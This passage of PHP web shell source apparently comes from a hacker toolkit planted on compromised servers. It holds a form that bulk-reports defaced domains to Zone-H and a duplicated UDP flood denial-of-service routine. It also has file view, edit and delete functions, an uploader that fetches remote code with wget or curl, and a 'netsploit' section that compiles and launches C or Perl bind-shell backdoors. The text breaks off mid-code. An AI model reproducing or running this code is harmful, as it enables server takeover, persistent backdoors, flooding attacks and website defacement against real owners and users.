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%3D" style="width: 261px; height: 67px;" /></p>
  2733. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Newbie3viLc063s" /><br> <select class="inputz" name="hackmode">
  2734. <option>------------------------------------SELECT-------------------------------------</option>
  2735. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  2736. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  2737. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  2738. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  2739. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  2740. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  2741. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  2742. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  2743. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  2744. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  2745. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  2746. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  2747. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  2748. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  2749. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  2750. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  2751. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  2752. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  2753. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  2754. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  2755. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  2756. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  2757. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  2758. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  2759. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  2760. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  2761. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  2762. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  2763.  
  2764. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  2765. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  2766. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2767. </select> <br>
  2768.  
  2769. <select class="inputz" name="reason">
  2770. <option >------------------------------------SELECT-------------------------------------</option>
  2771. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  2772. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  2773. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  2774. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  2775. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  2776. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  2777. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  2778. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2779. </select> <br>
  2780. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  2781. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  2782. </form>'; ?>
  2783. <?
  2784.     echo "</form></center>";?>
  2785. <?
  2786. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  2787. {
  2788.     $k = curl_init();
  2789.     curl_setopt($k, CURLOPT_URL, $url);
  2790.     curl_setopt($k,CURLOPT_POST,true);
  2791.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  2792.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2793.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2794.     $kubra = curl_exec($k);
  2795.     curl_close($k);
  2796.     return $kubra;
  2797. }
  2798. {
  2799.                 ob_start();
  2800.                 $sub = @get_loaded_extensions();
  2801.                 if(!in_array("curl", $sub))
  2802.                 {
  2803.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  2804.                 }
  2805.              
  2806.                 $hacker = $_POST['defacer'];
  2807.                 $method = $_POST['hackmode'];
  2808.                 $neden = $_POST['reason'];
  2809.                 $site = $_POST['domain'];
  2810.                  
  2811.                 if (empty($hacker))
  2812.                 {
  2813.                     die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  2814.                 }
  2815.                 elseif($method == "--------SELECT--------")  
  2816.                 {
  2817.                     die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  2818.                 }
  2819.                 elseif($neden == "--------SELECT--------")  
  2820.                 {
  2821.                     die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  2822.                 }
  2823.                 elseif(empty($site))  
  2824.                 {
  2825.                     die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  2826.                 }
  2827.                 $i = 0;
  2828.                 $sites = explode("\n", $site);
  2829.                 while($i < count($sites))  
  2830.                 {
  2831.                     if(substr($sites[$i], 0, 4) != "http")  
  2832.                     {
  2833.                         $sites[$i] = "http://".$sites[$i];
  2834.                     }
  2835.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  2836.                     echo "Domain : ".$sites[$i]." Defaced Last Years !";
  2837.                     ++$i;
  2838.                 }
  2839.                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  2840.             }
  2841. ?>
  2842. <?php }
  2843.  
  2844. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2845.     {  
  2846.     ?>
  2847.     <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2848.     <?php
  2849.    
  2850.     //UDP
  2851.     if(isset($_GET['host'])&&isset($_GET['time']))
  2852.         {
  2853.         $packets = 0;
  2854.         ignore_user_abort(TRUE);
  2855.         set_time_limit(0);
  2856.        
  2857.         $exec_time = $_GET['time'];
  2858.        
  2859.         $time = time();
  2860.         //print "Started: ".time('d-m-y h:i:s')."<br>";
  2861.         $max_time = $time+$exec_time;
  2862.        
  2863.         $host = $_GET['host'];
  2864.        
  2865.         for($i=0;$i<65000;$i++){
  2866.             $out .= 'X';
  2867.         }
  2868.        
  2869.         while(1){
  2870.             $packets++;
  2871.             if(time() > $max_time){ break; }
  2872.             $rand = rand(1,65000);
  2873.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2874.             if($fp){
  2875.                 fwrite($fp, $out);
  2876.                 fclose($fp);
  2877.             }
  2878.         }
  2879.    
  2880.         echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2881.         echo '<br><br>
  2882.         <form action="'.$surl.'" method=GET>
  2883.             <input type="hidden" name="act" value="phptools">
  2884.             Host: <br><input type=text name=host><br>
  2885.             Length (seconds): <br><input type=text name=time><br>
  2886.             <input type=submit value=Go>
  2887.         </form>';
  2888.         }
  2889.     else
  2890.         {
  2891.         echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2892.             <table class="tabnet" style="width:300px;">
  2893.                 <tr>
  2894.                     <th colspan="2">UDP Flood</th>
  2895.                 </tr>
  2896.                 <tr>
  2897.                     <td>&nbsp;&nbsp;Host</td>
  2898.                     <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  2899.                 </tr>
  2900.                 <tr>
  2901.                     <td>&nbsp;&nbsp;Length (seconds)</td>
  2902.                     <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  2903.                 </tr>
  2904.                 <tr>
  2905.                     <td><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
  2906.                 </tr>
  2907.             </table>
  2908.               </center>';
  2909.         }
  2910.     }
  2911.  
  2912. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2913.     {  
  2914.     ?>
  2915.     <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2916.     <?php
  2917.    
  2918.     //UDP
  2919.     if(isset($_GET['host'])&&isset($_GET['time']))
  2920.         {
  2921.         $packets = 0;
  2922.         ignore_user_abort(TRUE);
  2923.         set_time_limit(0);
  2924.        
  2925.         $exec_time = $_GET['time'];
  2926.        
  2927.         $time = time();
  2928.         //print "Started: ".time('d-m-y h:i:s')."<br>";
  2929.         $max_time = $time+$exec_time;
  2930.        
  2931.         $host = $_GET['host'];
  2932.        
  2933.         for($i=0;$i<65000;$i++){
  2934.             $out .= 'X';
  2935.         }
  2936.        
  2937.         while(1){
  2938.             $packets++;
  2939.             if(time() > $max_time){ break; }
  2940.             $rand = rand(1,65000);
  2941.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2942.             if($fp){
  2943.                 fwrite($fp, $out);
  2944.                 fclose($fp);
  2945.             }
  2946.         }
  2947.    
  2948.         echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2949.         echo '<br><br>
  2950.         <form action="'.$surl.'" method=GET>
  2951.             <input type="hidden" name="act" value="phptools">
  2952.             Host: <br><input type=text name=host><br>
  2953.             Length (seconds): <br><input type=text name=time><br>
  2954.             <input type=submit value=Go>
  2955.         </form>';
  2956.         }
  2957.     else
  2958.         {
  2959.         echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2960.             <table class="tabnet" style="width:300px;">
  2961.                 <tr>
  2962.                     <th colspan="2">UDP Flood</th>
  2963.                 </tr>
  2964.                 <tr>
  2965.                     <td>&nbsp;&nbsp;Host</td>
  2966.                     <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  2967.                 </tr>
  2968.                 <tr>
  2969.                     <td>&nbsp;&nbsp;Length (seconds)</td>
  2970.                     <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  2971.                 </tr>
  2972.                 <tr>
  2973.                     <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
  2974.                 </tr>
  2975.             </table>
  2976.               </center>';
  2977.         }
  2978.     }
  2979.  
  2980.  
  2981. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
  2982.     {
  2983.     @ob_start();
  2984.     @eval("phpinfo();");
  2985.     $buff = @ob_get_contents();
  2986.     @ob_end_clean();
  2987.     $awal = strpos($buff,"<body>")+6;
  2988.     $akhir = strpos($buff,"</body>");
  2989.     echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  2990.     }
  2991.  
  2992. elseif(isset($_GET['view']) && ($_GET['view'] != ""))
  2993.     {
  2994.     if(is_file($_GET['view']))
  2995.         {
  2996.         if(!isset($file)) $file = magicboom($_GET['view']);
  2997.         if(!$win && $posix)
  2998.             {
  2999.             $name=@posix_getpwuid(@fileowner($file));
  3000.             $group=@posix_getgrgid(@filegroup($file));
  3001.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  3002.             }
  3003.         else { $owner = $user; }
  3004.         $filn = basename($file);
  3005.         echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  3006.             <tr>
  3007.                 <td>Filename</td>
  3008.                 <td>
  3009.                     <span id=\"".clearspace($filn)."_link\">".$file."</span>
  3010.                     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  3011.                         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  3012.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  3013.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  3014.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  3015.                             onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  3016.                     </form>
  3017.                 </td>
  3018.             </tr>
  3019.             <tr>
  3020.                 <td>Size</td>
  3021.                 <td>".ukuran($file)."</td>
  3022.             </tr>
  3023.             <tr>
  3024.                 <td>Permission</td>
  3025.                 <td>".get_perms($file)."</td>
  3026.             </tr>
  3027.             <tr>
  3028.                 <td>Owner</td>
  3029.                 <td>".$owner."</td>
  3030.             </tr>
  3031.             <tr>
  3032.                 <td>Create time</td>
  3033.                 <td>".date("d-M-Y H:i",@filectime($file))."</td>
  3034.             </tr>
  3035.             <tr>
  3036.                 <td>Last modified</td>
  3037.                 <td>".date("d-M-Y H:i",@filemtime($file))."</td>
  3038.             </tr>
  3039.             <tr>
  3040.                 <td>Last accessed</td>
  3041.                 <td>".date("d-M-Y H:i",@fileatime($file))."</td>
  3042.             </tr>
  3043.             <tr>
  3044.                 <td>Actions</td>
  3045.                 <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  3046.                     | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  3047.                     | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  3048.                     | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  3049.                 </td>
  3050.             </tr>
  3051.             <tr>
  3052.                 <td>View</td>
  3053.                 <td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a>
  3054.                     | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a>
  3055.                     | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">img</a>
  3056.                 </td>
  3057.             </tr>
  3058.         </table> ";
  3059.         if(isset($_GET['type']) && ($_GET['type']=='image'))
  3060.             { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; }
  3061.         elseif(isset($_GET['type']) && ($_GET['type']=='code'))
  3062.             { echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; }
  3063.         else    { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; }
  3064.         }
  3065.     elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
  3066.     }
  3067.  
  3068. elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
  3069.     {
  3070.     if(isset($_POST['save']))
  3071.         {
  3072.         $file = $_POST['saveas'];
  3073.         $content = magicboom($_POST['content']);
  3074.         if($filez = @fopen($file,"w"))
  3075.             {
  3076.             $time = date("d-M-Y H:i",time());
  3077.             if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  3078.             else $msg = "failed to save"; @fclose($filez);
  3079.             }
  3080.         else $msg = "permission denied";
  3081.         }
  3082.     if(!isset($file)) $file = $_GET['edit'];
  3083.     if($filez = @fopen($file,"r"))
  3084.         {
  3085.         $content = "";
  3086.         while(!feof($filez))
  3087.             {
  3088.             $content .= htmlentities(str_replace("''","'",fgets($filez)));
  3089.             }
  3090.         @fclose($filez);
  3091.         } ?>
  3092.     <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  3093.         <table class="cmdbox">
  3094.             <tr>
  3095.                 <td colspan="2">
  3096.                 <textarea class="output" name="content"><?php echo $content; ?></textarea>
  3097.                 </td>
  3098.             <tr>
  3099.                 <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  3100.                 <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?>
  3101.                 </td>
  3102.             </tr>
  3103.         </table>
  3104.     </form>
  3105. <?php
  3106.     }
  3107.  
  3108. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
  3109.     {
  3110.     if(isset($_POST['uploadcomp']))
  3111.         {
  3112.         if(is_uploaded_file($_FILES['file']['tmp_name']))
  3113.             {
  3114.             $path = magicboom($_POST['path']);
  3115.             $fname = $_FILES['file']['name'];
  3116.             $tmp_name = $_FILES['file']['tmp_name'];
  3117.             $pindah = $path.$fname;
  3118.             $stat = @move_uploaded_file($tmp_name,$pindah);
  3119.             if ($stat) { $msg = "file uploaded to $pindah"; }
  3120.             else $msg = "failed to upload $fname";
  3121.             }
  3122.         else $msg = "failed to upload $fname";
  3123.         }
  3124.     elseif(isset($_POST['uploadurl']))
  3125.         {
  3126.         $pilihan = trim($_POST['pilihan']);
  3127.         $wurl = trim($_POST['wurl']);
  3128.         $path = magicboom($_POST['path']);
  3129.         $namafile = download($pilihan,$wurl);
  3130.         $pindah = $path.$namafile;
  3131.         if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  3132.         else $msg = "failed ! to upload $namafile"; }
  3133.     ?>
  3134.     <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3135.         <table class="tabnet" style="width:320px;padding:0 1px;">
  3136.             <tr>
  3137.                 <th colspan="2">Upload from computer</th>
  3138.             </tr>
  3139.             <tr>
  3140.            
  3141.                 <td colspan="2">
  3142.                     <p style="text-align:center;">
  3143.                     <input style="color:#7CDA89;" type="file" name="file" />
  3144.                     <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
  3145.                     </p>
  3146.                 </td>
  3147.             </tr>
  3148.             <tr>
  3149.                 <td colspan="2">
  3150.                     <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
  3151.                 </td>
  3152.             </tr>
  3153.         </table>
  3154.     </form>
  3155.     <table class="tabnet" style="width:320px;padding:0 1px;">
  3156.         <tr>
  3157.             <th colspan="2">Upload from url</th>
  3158.         </tr>
  3159.         <tr>
  3160.             <td colspan="2">
  3161.                 <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3162.                     <table>
  3163.                         <tr>
  3164.                             <td>url</td>
  3165.                             <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
  3166.                         </tr>
  3167.                         <tr>
  3168.                             <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
  3169.                         </tr>
  3170.                         <tr>
  3171.                             <td>
  3172.                             <select size="1" class="inputz" name="pilihan">
  3173.                                 <option value="wwget">wget</option>
  3174.                                 <option value="wlynx">lynx</option>
  3175.                                 <option value="wfread">fread</option>
  3176.                                 <option value="wfetch">fetch</option>
  3177.                                 <option value="wlinks">links</option>
  3178.                                 <option value="wget">GET</option>
  3179.                                 <option value="wcurl">curl</option>
  3180.                             </select>
  3181.                             </td>
  3182.                             <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
  3183.                         </tr>
  3184.                     </table>
  3185.                 </form>
  3186.             </td>
  3187.         </tr>
  3188.     </table>
  3189.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3190. <?php }
  3191.  
  3192. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
  3193.     {
  3194.     if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  3195.         {  
  3196.         $port = trim($_POST['port']);
  3197.         $passwrd = trim($_POST['bind_pass']);
  3198.         tulis("bdc.c",$port_bind_bd_c);
  3199.         exe("gcc -o bdc bdc.c");
  3200.         exe("chmod 777 bdc");
  3201.         @unlink("bdc.c");
  3202.         exe("./bdc ".$port." ".$passwrd." &");
  3203.         $scan = exe("ps aux");
  3204.         if(eregi("./bdc $por",$scan))
  3205.             {
  3206.             $msg = "<p>Process found running, backdoor setup successfully.</p>";
  3207.             }
  3208.         else
  3209.             {
  3210.             $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  3211.             }
  3212.         }
  3213.     elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  3214.         {
  3215.         $port = trim($_POST['port']);
  3216.         $passwrd = trim($_POST['bind_pass']);
  3217.         tulis("bdp",$port_bind_bd_pl);
  3218.         exe("chmod 777 bdp");
  3219.         $p2=which("perl");
  3220.         exe($p2." bdp ".$port." &");
  3221.         $scan = exe("ps aux");
  3222.         if(eregi("$p2 bdp $port",$scan))
  3223.             { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  3224.         else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
